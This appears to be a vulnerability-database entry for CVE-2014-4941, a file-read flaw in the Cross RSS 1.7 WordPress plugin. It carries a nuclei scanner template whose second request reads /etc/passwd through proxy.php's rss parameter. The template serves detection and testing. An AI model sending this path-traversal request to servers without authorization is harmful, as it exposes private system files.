Lucene search
K

Cross RSS 1.7 - Local File Inclusion

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Cross RSS 1.7 - Local File Inclusion vulnerability in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-4941
11 Jul 201420:00
cve
Cvelist
CVE-2014-4941
11 Jul 201420:00
cvelist
EUVD
EUVD-2014-4858
7 Oct 202500:30
euvd
NVD
CVE-2014-4941
11 Jul 201420:55
nvd
OpenVAS
WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)
20 Nov 202000:00
openvas
Patchstack
WordPress Cross References Plugin <= 1.7 - Local File Inclusion
11 Jul 201400:00
patchstack
Prion
Path traversal
11 Jul 201420:55
prion
RedhatCVE
CVE-2014-4941
9 Jan 202612:50
redhatcve
Tenable Nessus
Cross-RSS Plugin for WordPress Arbitrary Files Read
3 Jan 202300:00
nessus
WPVulnDB
Cross RSS 1.7 - proxy.php rss Parameter Local File Inclusion
1 Aug 201410:59
wpvulndb
Rows per page
id: CVE-2014-4941

info:
  name: Cross RSS 1.7 - Local File Inclusion
  author: DhiyaneshDK
  severity: medium
  description: |
    Absolute path traversal vulnerability in Cross-RSS (wp-cross-rss) plugin 1.7 for WordPress allows remote attackers to read arbitrary files via a full pathname in the rss parameter to proxy.php.
  impact: |
    Attackers can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://wordpress.org/plugins/cross-rss/
    - https://codevigilant.com/disclosure/wp-plugin-cross-rss-local-file-inclusion/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4941
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4941
    cwe-id: CWE-22
    epss-score: 0.04306
    epss-percentile: 0.8988
    cpe: cpe:2.3:a:cross-rss_plugin_project:wp-cross-rss:1.7:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cross-rss_plugin_project
    product: wp-cross-rss
    framework: wordpress
  tags: cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/cross-rss/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402200ef92386d7832659160f5af994c5e235553fb9b1fbe4540efe3befa286f4eff5022018fba3fc3ebed140b5b835a9d0bb587053dfcbc54434619e5ee6c797757d605a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
EPSS0.04306
23